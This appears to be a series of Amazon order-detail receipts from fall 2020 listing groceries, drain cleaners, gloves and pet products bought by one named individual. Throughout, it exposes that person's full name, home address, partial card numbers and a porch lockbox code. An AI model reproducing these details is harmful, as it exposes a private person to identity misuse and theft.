24, 2020:$11.25 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0452420-0937028 Order Placed: October 9, 2020 Amazon.com order number: 111-0452420-0937028 Order Total: $156.49 Shipped on October 9, 2020 Items Ordered 1 of: GT's Kombucha, Gingerade 16 Fl Oz Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Sweet Earth Benevolent Bacon, Hickory and Sage Plant Based Protein, 0.34375 lb Sold by: Whole Foods Market (seller profile) Condition: New 2 of: KeVita Master Brew Kombucha, Ginger, with Live Probiotics, 15.2 oz. Sold by: Whole Foods Market (seller profile) Condition: New 4 of: 365 by Whole Foods Market, Frozen Organic Wild Blueberries, 32 Ounce Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Starfish, Crispy Battered Halibut, 10 oz Sold by: Whole Foods Market (seller profile) Condition: New 2.96 lb of: Beef Chuck Short Rib Bone-In Flanken Step 1 Sold by: Whole Foods Market (seller profile) Condition: New 2 of: 365 Everyday Value, Organic Dark Sweet Cherries, 10 oz, (Frozen) Sold by: Whole Foods Market (seller profile) Condition: New 2 of: Raspberry Red Organic, 6 Ounce Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Australis, Lemon Herb Butter Barramundi Fillet, 12 oz (Frozen) Sold by: Whole Foods Market (seller profile) Condition: New 2 of: Amy's Pad Thai, Made with Organic Rice Noodles, Vegetables & Tofu, Non GMO, 9.5-Ounce Sold by: Whole Foods Market (seller profile) Price $2.25 $3.14 $2.69 $8.49 $12.99 ($7.99/lb $23.65 $3.99 $2.70 $9.99 $3.59 Condition: New 2 of: Greens Kale Green Organic, 1 Bunch $1.99 Sold by: Whole Foods Market (seller profile) Condition: New 2 of: 365 Everyday Value, Distilled Water, 128 fl oz $0.99 Sold by: Whole Foods Market (seller profile) Condition: New 2 of: Evolved Chocolate -Organic Keto Chocolate Bar, Midnight Coconut, 100% $3.79 Cacao -Keto, Dairy-Free, Soy-Free, Paleo Friendly, Vegan Friendly, No Added Sugar, Dark Chocolate -2.3 oz each (8 Count) Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Wellshire Farms, Paleo Sugar-Free Bacon, 8 oz $4.49 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Evol, Bowl Bulgogi Beef, 9 Ounce $3.60 Sold by: Whole Foods Market (seller profile) Condition: New 2 of: 365 Everyday Value, Dark Sweet Cherries, 16 oz, (Frozen) $4.69 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Bell & Evans, Frozen Breaded Boneless Chicken Breast (Raised without $6.99 Antibiotics), 10.5 oz Sold by: Whole Foods Market (seller profile) Condition: New 1 of: 365 Everyday Value, Wild-Caught Breaded Fish Fillets, 12 oz (Frozen) $5.99 Sold by: Whole Foods Market (seller profile) Condition: New Shipping Address: Whole Foods Market -Silver Spring Map 833 Wayne Ave Silver Spring, MD 20910-4427 United States Recipient for Pick-Up: Brian J. Coady Shipping Speed: Hand delivery and installation Payment information Payment Method: Item(s) Subtotal: $155.91 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $155.91 Brian J Coady 1454 Monroe St. NW Estimated tax to be collected: $0.58 Washington, DC 20010 ----United States Grand Total:$156.49 Credit Card transactions AmazonPLCC ending in 3157: October 9, 2020:$156.49 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #114-0152462-3209075 Order Placed: October 9, 2020 Amazon.com order number: 114-0152462-3209075 Order Total: $86.41 Shipped on October 9, 2020 Items Ordered Price 1 of: Medpride Medical Exam Latex Gloves| 5 mil Thick, Large Box of 100 Powder-Free $24.95 Sold by: HLmedical (seller profile) Condition: New 1 of: Powder Free Disposable Gloves X Large -100 Pack -Nitrile and Vinyl Blend Material -Extra Strong, 4 Mil Thick -Latex Free, Food Safe, Blue -Medical Exam Gloves, Cleaning Gloves Sold by: Click-Medical (seller profile) | Product question? Ask Seller $24.98 Condition: New 2 of: Medpride Vinyl Gloves| Large Box of 100| 4.3 mil Thick, Powder-Free, Non-Sterile, Heavy Duty Disposable Gloves| Professional Grade for Healthcare, Medical, Food Handling, and More Sold by: HLmedical (seller profile) $15.79 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $81.51 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $81.51 Brian J Coady Estimated tax to be collected: $4.90 1454 Monroe St. NW Washington, DC 20010 Grand Total:$86.41 United States Credit Card transactions AmazonPLCC ending in 3157: October 9, 2020:$86.41 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #112-0650775-5654646 Subscribe and Save Order Placed: October 13, 2020 Amazon.com order number: 112-0650775-5654646 Order Total: $14.66 This order contains Subscribe & Save items. Shipped on November 1, 2020 Items Ordered Price 1 of: Amazon Brand -Solimo Red Energy Drink, Sugar Free, 16 Fluid Ounce (Pack of $27.73 24) Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $27.73 Visa | Last digits: 0222 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$4.16 Whole Foods Credit:-$10.00 Billing address Brian J Coady Total before tax: $13.571454 Monroe St. NW Estimated tax to be collected: $1.09Washington, DC 20010 United States Grand Total:$14.66 Credit Card transactions Visa ending in 0222: November 1, 2020:$14.66 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-6918190-7988237 Order Placed: October 13, 2020 Amazon.com order number: 112-6918190-7988237 Order Total: $12.71 Shipped on October 13, 2020 Items Ordered Price 1 of: LELONG for Apple Watch Band 38mm 40mm 42mm 44mm SE Series 6 Series 5 4 $15.99 3 2 1 , Bling Replacement Bracelet iWatch Band, Diamond Rhinestone Stainless Steel Metal Wristband Strap Sold by: LELONG (seller profile) Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $15.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Lightning Deal: -$4.00 Billing address Brian J Coady Total before tax: $11.991454 Monroe St. NW Estimated tax to be collected: $0.72Washington, DC 20010 United States Grand Total:$12.71 Credit Card transactions AmazonPLCC ending in 3157: October 13, 2020:$12.71 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-1676721-3427421 Order Placed: September 29, 2020 Amazon.com order number: 114-1676721-3427421 Order Total: $21.19 Shipped on September 29, 2020 Items Ordered Price 1 of: OxyLED Motion Sensor Closet Lights, Cordless Under Cabinet Lightening, Wireless Stick-on Anywhere Battery Operated 10 LED Night Light Bar, Safe Lights Sold by: Thousandshores Inc (seller profile) $19.99 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $19.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $19.99Brian J Coady Estimated tax to be collected: $1.201454 Monroe St. NW Washington, DC 20010 Grand Total:$21.19 United States Credit Card transactions AmazonPLCC ending in 3157: September 29, 2020:$21.19 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-8111063-4581867 Order Placed: September 29, 2020 Amazon.com order number: 114-8111063-4581867 Order Total: $31.79 Shipped on September 29, 2020 Items Ordered Price 1 of: Upgraded Motion Sensor LED Night Light, Non-Fall Cordless Battery-Powered Wall Light, Stick-on Magnet Closet Lights, Safe Lights for Stairs, Hallway, Sold by: Tuo Xiang Direct (seller profile) $29.99 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $29.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $29.99Brian J Coady Estimated tax to be collected: $1.801454 Monroe St. NW Washington, DC 20010 Grand Total:$31.79 United States Credit Card transactions AmazonPLCC ending in 3157: September 29, 2020:$31.79 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-9572210-9547428 Order Placed: September 29, 2020 Amazon.com order number: 114-9572210-9547428 Order Total: $42.03 Shipped on September 30, 2020 Items Ordered Price 1 of: USB Rechargeable Lithium AAA Batteries Triple A Li-ion Battery with Micro USB Charging Cable 1.5V 450mAh 1h Quick-Charge FUVALY (4pack) Sold by: Fuvaly Official Store (seller profile) $24.99 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: FREE Prime Delivery Shipped on September 29, 2020 Items Ordered Price 1 of: EBL C Size Battery Adapters, AA to C Size Battery Spacer Converter Case Use with $6.69 Rechargeable AA Battery Cells -4 Pack Sold by: EBL official (seller profile) | Product question? Ask Seller Condition: New 1 of: Professional Dental Scraper -100% Stainless Steel Double Ended Dental Scaler $7.97 Instrument -Perfect Tool for at Home Oral Hygiene & Care – Scraper Picks at Tartar & for Plaque Removal Sold by: Amadurra (seller profile) Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $39.65 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $39.65Brian J Coady Estimated tax to be collected: $2.381454 Monroe St. NW Washington, DC 20010 Grand Total:$42.03 United States Credit Card transactions AmazonPLCC ending in 3157: September 30, 2020:$42.03 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-1201980-0246630 Order Placed: September 29, 2020 Amazon.com order number: 112-1201980-0246630 Order Total: $14.83 Shipped on September 29, 2020 Items Ordered Price 1 of: Kitchen Silicone Sponge Dish Washing -Dolike 3-in-1 Reusable Cleaning Sponges $13.99 for Dishes and Scrubbers with Scraper, Dish Sponges for Cleaning Scrub Sold by: CXSDUS (seller profile) Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $13.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $13.99Brian J Coady Estimated tax to be collected: $0.841454 Monroe St. NW Washington, DC 20010 Grand Total:$14.83 United States Credit Card transactions AmazonPLCC ending in 3157: September 29, 2020:$14.83 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-0031552-9289037 Order Placed: September 29, 2020 Amazon.com order number: 113-0031552-9289037 Order Total: $7.41 Shipped on September 30, 2020 Items Ordered 1 of: ASURION 3 Year Housewares Protection Plan $50-59.99 Sold by: Asurion, LLC (seller profile) Price $6.99 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Expedited Shipping Payment information Payment Method: Item(s) Subtotal: $6.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $6.99 Brian J Coady Estimated tax to be collected: $0.42 1454 Monroe St. NW Washington, DC 20010 Grand Total:$7.41 United States Credit Card transactions AmazonPLCC ending in 3157: September 30, 2020:$7.41 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-8973364-6301032 Subscribe and Save Order Placed: September 30, 2020 Amazon.com order number: 113-8973364-6301032 Order Total: $14.82 This order contains Subscribe & Save items. Shipped on October 12, 2020 Items Ordered 1 of: Instant Power 1510 Commercial Drain Cleaner, 1-Gallon Sold by: Amazon.com Services LLC Price $13.98 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $13.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Total before tax: $13.98Billing address Estimated tax to be collected: $0.84Brian J Coady 1454 Monroe St. NW Grand Total:$14.82 Washington, DC 20010 United States Credit Card transactions AmazonPLCC ending in 3157: October 12, 2020:$14.82 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-5967262-8967414 Order Placed: October 2, 2020 Amazon.com order number: 111-5967262-8967414 Order Total: $17.00 Shipped on October 3, 2020 Items Ordered Price 1 of: Feliway Classic Calming Diffuser Refill (1 Pack, 48 ml) | Reduce Problem, Scratching, Spraying, and Fighting | Constant Calm & Comfort At Home Sold by: Amazon.com Services LLC $16.04 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $16.04 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $16.04Brian J Coady Estimated tax to be collected: $0.961454 Monroe St. NW Washington, DC 20010 Grand Total:$17.00 United States Credit Card transactions AmazonPLCC ending in 3157: October 3, 2020:$17.00 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-8067050-7641817 Order Placed: October 2, 2020 Amazon.com order number: 111-8067050-7641817 Order Total: $15.68 Shipped on October 3, 2020 Items Ordered Price 1 of: ThunderWunders Cat Calming Chews | Vet Recommended to Help Reduce Situational Anxiety | Great for Vet Visits, Travel, Separation Anxiety, Fireworks, T Sold by: Amazon.com Services LLC $14.79 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: FREE Prime Delivery Payment information Payment Method: Item(s) Subtotal: $14.79 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $14.79Brian J Coady Estimated tax to be collected: $0.891454 Monroe St. NW Washington, DC 20010 Grand Total:$15.68 United States Credit Card transactions AmazonPLCC ending in 3157: October 3, 2020:$15.68 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-6501775-4345012 Order Placed: September 18, 2020 Amazon.com order number: 112-6501775-4345012 Order Total: $103.87 Shipped on September 18, 2020 Items Ordered 1 of: 365 Everyday Value, Organic Stevia Extract Liquid, 8 fl oz Sold by: Whole Foods Market (seller profile) Price $17.99 Condition: New 2 of: Horizon Organic, Heavy Whipping Cream, Pint, 16 oz Sold by: Whole Foods Market (seller profile) $5.79 Condition: New 1 of: World Centric Wheat Straw/Bagasse 10-Inch Fiber Three Compartment Plate, 20-Piece Sold by: Whole Foods Market (seller profile) $5.99 Condition: New 1 of: 365 by Whole Foods Market, Frozen Organic Wild Blueberries, 32 Ounce Sold by: Whole Foods Market (seller profile) $7.99 Condition: New 2 of: Mini Babybel Cheese, Sharp Cheddar, 6 Count Sold by: Whole Foods Market (seller profile) $3.49 Condition: New 2 of: Wallaby Organic Mango Lowfat Kefir, 32 oz Sold by: Whole Foods Market (seller profile) $3.59 Condition: New 2 of: Gts Living Foods, Kombucha Rose Berry Organic, 16 Fl Oz Sold by: Whole Foods Market (seller profile) $3.49 Condition: New 1.01 lb of: Chix Mock General TSO Vegan Chef's Case Sold by: Whole Foods Market (seller profile) ($11.99/lb $12.11 Condition: New 3 of: 365 Everyday Value, Dark Sweet Cherries, 16 oz, (Frozen) Sold by: Whole Foods Market (seller profile) $4.69 Condition: New 1 of: Seventh Generation Chlorine Free Bleach, Free & Clear, 64 oz Sold by: Whole Foods Market (seller profile) $4.79 Print this page for your records. Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Scheduled delivery Payment information Payment Method: Item(s) Subtotal: $95.66 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $95.66 Brian J Coady Estimated tax to be collected: $1.211454 Monroe St. NW Washington, DC 20010 Tip (optional): 7.00United States Grand Total:$103.87 Credit Card transactions AmazonPLCC ending in 3157: September 20, 2020: $7.00 AmazonPLCC ending in 3157: September 18, 2020:$96.87 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-7685254-8457018 Order Placed: September 18, 2020 Amazon.com order number: 112-7685254-8457018 Order Total: $0.00 Shipped on September 19, 2020 Items Ordered Price 2 of: Gatorade Zero Sugar Thirst Quencher Bottles , Orange, 12 Ounce 12 Count $5.98 Sold by: Amazon Pantry (seller profile) Condition: New 1 of: Clorox Zero Splash Bleach Crystals, Regular Scent, 24 Ounces (Package May $5.46 Vary) Sold by: Amazon Pantry (seller profile) Condition: New 1 of: Kitchen Basics Original Chicken Bone Broth, 8.25 oz $2.49 Sold by: Amazon Pantry (seller profile) Condition: New 1 of: Meow Mix Irresistibles Soft Cat Treats, White Meat Chicken, 17 Ounces $7.99 Sold by: Amazon Pantry (seller profile) Condition: New 4 of: Ocean Spray Diet Juice Drink, Cranberry, 10 Ounce Bottle (Pack of 6) $3.72 Sold by: Amazon Pantry (seller profile) Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Pantry Delivery Shipped on September 19, 2020 Items Ordered Price 1 of: Amazon Brand -Solimo Silver Energy Drink, Sugar Free, 16 Fluid Ounce (Pack of $14.99 12) Sold by: Amazon Pantry (seller profile) Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Pantry Delivery Payment information Payment Method: Item(s) Subtotal: $57.77 Amazon.com Store Card | Last digits: 3157 Pantry delivery: $5.99 Rewards Points Free delivery: -$5.99 Billing address Total before tax: $57.77Brian J Coady Estimated tax to be collected: $4.171454 Monroe St. NW Rewards Points:-$61.94 Washington, DC 20010 United States Grand Total: $0.00 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9356288-3992206 Order Placed: September 20, 2020 Amazon.com order number: 111-9356288-3992206 Order Total: $61.71 Shipped on September 20, 2020 Items Ordered 1 of: 365 Everyday Value, Organic Chopped Kale, 12 oz Sold by: Prime Now LLC (seller profile) Condition: New 1 of: Liquid-Plumr Pro-Strength Full Clog Destroyer Plus PipeGuard, Liquid Drain Cleaner -80 Ounces Sold by: Prime Now LLC (seller profile) Condition: New 1 of: Jimmy Dean Fully Cooked Turkey Sausage Patties, 8 Count, Lil Rob Sold by: Prime Now LLC (seller profile) Condition: New 1 of: Amazon Kitchen, Caesar Salad with White Chicken, 12.6 oz Sold by: Prime Now LLC (seller profile) Condition: New 1 of: Mini Babybel Cheese, Original, 6 Count Sold by: Prime Now LLC (seller profile) Condition: New 1 of: Red Raspberries, 6 oz Sold by: Prime Now LLC (seller profile) Condition: New 2 of: Yellow Flesh Nectarine, One Sold by: Prime Now LLC (seller profile) Condition: New 1 of: OLD CROC CHEESE XSHARP Sold by: Prime Now LLC (seller profile) Condition: New 2 of: Horizon Organic, Heavy Whipping Cream, Pint, 16 oz Sold by: Prime Now LLC (seller profile) Condition: New 1 of: Aidells Smoked Chicken Sausage, Portobello & Swiss Cheese, 12 oz. (4 Fully Cooked Links) Sold by: Prime Now LLC (seller profile) Price $3.99 $7.33 $3.68 $8.99 $2.99 $2.75 $1.00 $3.24 $4.18 $5.25 Condition: New 1 of: Organic Girl, Organic Protein Greens, 4.2 oz Sold by: Prime Now LLC (seller profile) $3.99 Condition: New 1 of: 365 Everyday Value, Broccoli Florets, 12 oz Sold by: Prime Now LLC (seller profile) $2.49 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Scheduled delivery Payment information Payment Method: Item(s) Subtotal: $55.06 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Your Coupon Savings: -$0.74 Billing address Your Coupon Savings: -$1.05 Brian J Coady 1454 Monroe St. NW Total before tax: $53.27Washington, DC 20010 Estimated tax to be collected: $0.44United States Tip (optional): 8.00 Grand Total:$61.71 Credit Card transactions AmazonPLCC ending in 3157: September 22, 2020: $8.00 AmazonPLCC ending in 3157: September 20, 2020:$53.71 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-6907264-3724265 Order Placed: September 21, 2020 Amazon.com order number: 114-6907264-3724265 Order Total: $7.40 Shipped on September 24, 2020 Items Ordered Price 1 of: Drano Max Gel Drain Clog Remover and Cleaner for Shower or Sink Drains, Unclogs and Removes Hair, Soap Scum, Blockages, 80 oz Sold by: Amazon.com Services LLC $6.98 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $6.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $6.98Brian J Coady Estimated tax to be collected: $0.42 1454 Monroe St. NW Washington, DC 20010 Grand Total:$7.40 United States Credit Card transactions AmazonPLCC ending in 3157: September 24, 2020:$7.40 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-0648975-9958619 Order Placed: September 21, 2020 Amazon.com order number: 114-0648975-9958619 Order Total: $14.80 Shipped on September 24, 2020 Items Ordered Price 2 of: Drano Max Gel Drain Clog Remover and Cleaner for Shower or Sink Drains, Unclogs and Removes Hair, Soap Scum, Blockages, 80 oz Sold by: Amazon.com Services LLC $6.98 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $13.96 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $13.96Brian J Coady Estimated tax to be collected: $0.841454 Monroe St. NW Washington, DC 20010 Grand Total:$14.80 United States Credit Card transactions AmazonPLCC ending in 3157: September 24, 2020:$14.80 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-2169030-0553055 Order Placed: September 21, 2020 Amazon.com order number: 114-2169030-0553055 Order Total: $55.33 Shipped on September 22, 2020 Items Ordered 1 of: Brawny Tear-A-Square Paper Towels, 6 Rolls, 6 = 9 Regular Rolls, 3 Sheet Size Options, Quarter Size Sheets Sold by: Prime Now LLC (seller profile) Price $8.99 Condition: New 1 of: GT's Kombucha, Gingerberry 16 Fl Oz Sold by: Prime Now LLC (seller profile) $2.97 Condition: New 1 of: Amazon Brand -Happy Belly Cage-Free, Large, White Eggs, 1 Dozen Sold by: Prime Now LLC (seller profile) $2.79 Condition: New 2 of: Liquid-Plumr Pro-Strength Full Clog Destroyer Plus PipeGuard, Liquid Drain Cleaner -80 Ounces Sold by: Prime Now LLC (seller profile) $6.77 Condition: New 2 of: OLD CROC CHEESE XSHARP Sold by: Prime Now LLC (seller profile) $3.24 Condition: New 2 of: Kitu Super Coffee, SugarFree Keto Coffee (0g Added Sugar, 10g Protein, 80 Calories) [Hazelnut] 12 Fl Oz, 1 Pack | Iced Coffee, Protein Coffee, Coffee Drinks -LactoseFree, SoyFree, GlutenFree Sold by: Prime Now LLC (seller profile) $3.49 Condition: New 2 of: Mini Babybel Cheese, Original, 6 Count Sold by: Prime Now LLC (seller profile) $3.49 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Print this page for your records. Shipping Speed: Scheduled delivery Payment information Payment Method: Item(s) Subtotal: $48.73 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $48.73 Brian J Coady Estimated tax to be collected: $1.601454 Monroe St. NW Washington, DC 20010 Tip (optional): 5.00United States Grand Total:$55.33 Credit Card transactions AmazonPLCC ending in 3157: September 24, 2020: $5.00 AmazonPLCC ending in 3157: September 22, 2020:$50.33 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #114-0084171-9018605 Order Placed: September 22, 2020 Amazon.com order number: 114-0084171-9018605 Order Total: $72.60 Shipped on September 22, 2020 Items Ordered Price 1 of: GT's Kombucha, Gingerberry 16 Fl Oz $3.49 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: 365 Everyday Value, Distilled Water, 128 fl oz $0.99 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Schmidt's Deodorant, Spray Multi-Surface Vinegar Citrus Minerals, 16 $4.04 Ounce Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Raspberry Red Organic, 6 Ounce $3.00 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Earthworm, Cleaner Drain Family Safe, 32 Fl Oz $5.49 Sold by: Whole Foods Market (seller profile) Condition: New 2 of: 365 Everyday Value, Baking Soda, 16 oz $0.99 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: 365 Everyday Value, Organic Almonds, Roasted & Salted, 10 oz $7.99 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Mini Babybel Cheese, Original, 6 Count $3.49 Sold by: Whole Foods Market (seller profile) Condition: New 2 of: 365 Everyday Value, Organic Dark Sweet Cherries, 10 oz, (Frozen) $3.99 Sold by: Whole Foods Market (seller profile) Condition: New 3 (1.23 lb) of: Organic Nectarine ($2.24/lb)$2.76 Sold by: Whole Foods Market (seller profile) Condition: New 2.13 lb of: Chix Mock General TSO Vegan Chef's Case Sold by: Whole Foods Market (seller profile) ($11.99/lb $25.54 Condition: New Shipping Address: Brian J Coady 1454 Monroe St. NW Washington, DC 20010 United States Shipping Speed: Scheduled delivery Payment information Payment Method: Item(s) Subtotal: $66.75 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $66.75 Brian J Coady Estimated tax to be collected: $0.851454 Monroe St. NW Washington, DC 20010 Tip (optional): 5.00United States Grand Total:$72.60 Credit Card transactions AmazonPLCC ending in 3157: September 27, 2020: $5.00 AmazonPLCC ending in 3157: September 22, 2020:$67.60 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-8377658-8484204 Subscribe and Save Order Placed: September 28, 2020 Amazon.com order number: 113-8377658-8484204 Order Total: $28.49 This order contains Subscribe & Save items. Shipped on October 4, 2020 Items Ordered Price 1 of: LES Labs Inflammatory Health, Joint Supplement for Joint & Muscle Pain and Discomfort, Mobility and Healthy Inflammation Response with Turmeric, Boswe Sold by: LES Labs (seller profile) $29.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW Porch lockbox code 5977# WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $29.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Gift Card Subscribe & Save: -$1.50 Billing address Total before tax: $28.49Brian J Coady Estimated tax to be collected: $0.001454 Monroe St. NW Washington, DC 20010 Grand Total:$28.49 United States Credit Card transactions AmazonPLCC ending in 3157: October 4, 2020:$28.49 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #112-2863605-1625006 Order Placed: September 28, 2020 Amazon.com order number: 112-2863605-1625006 Order Total: $126.52 Shipped on September 28, 2020 Items Ordered 1 of: 365 Everyday Value, Organic Dark Sweet Cherries, 10 oz, (Frozen) Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Harrisburg Dairies, Cream Heavy, 16 Fl Oz Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Mini Babybel Cheese, Original, 6 Count Sold by: Whole Foods Market (seller profile) Condition: New 2 of: 365 Everyday Value, Chopped Spinach, 16 oz, (Frozen) Sold by: Whole Foods Market (seller profile) Condition: New 1 of: PICNIK Unsweetened Collagen Creamer, 25.36 FZ/count ( 2 count ) Sold by: Whole Foods Market (seller profile) Condition: New 3 (1.50 lb) of: Organic Nectarine Sold by: Whole Foods Market (seller profile) Condition: New 1.00 lb of: Kerrygold, Cheddar Kilaree Aged 15 Month Sold by: Whole Foods Market (seller profile) Condition: New 2 of: Raspberry Red Organic, 6 Ounce Sold by: Whole Foods Market (seller profile) Condition: New 1 of: 365 Everyday Value, Organic Walnuts, Halves & Pieces, 10 oz Sold by: Whole Foods Market (seller profile) Condition: New 1 of: Gts Living Foods, Kombucha Pomegranate Power Organic, 16 Fl Oz Sold by: Whole Foods Market (seller profile) Condition: New Price $3.99 $2.99 $3.49 $1.49 $5.49 ($3.49/lb $5.24 ($9.89/lb $9.89 $2.25 $8.99 $3.49 1.57 lb of: Chix Mock General TSO Vegan Chef's Case ($11.99/lb Sold by: Whole Foods Market (seller profile) $18.82 Condition: New 1 of: Bell & Evans, Frozen Breaded Chicken Tender (Raised without Antibiotics), $6.99 12 oz Sold by: Whole Foods Market (seller profile) Condition: New 3 of: Moon Cheese -100% Natural Cheese Snack -Gouda -2 oz $3.15 Sold by: Whole Foods Market (seller profile) Condition: New 1 of: 365 by Whole Foods Market, Frozen Organic Wild Blueberries, 32 Ounce $7.99 Sold by: Whole Foods Market (seller profile) Condition: New 2 of: Cabot Seriously Sharp Cheddar Cheese, 8 oz 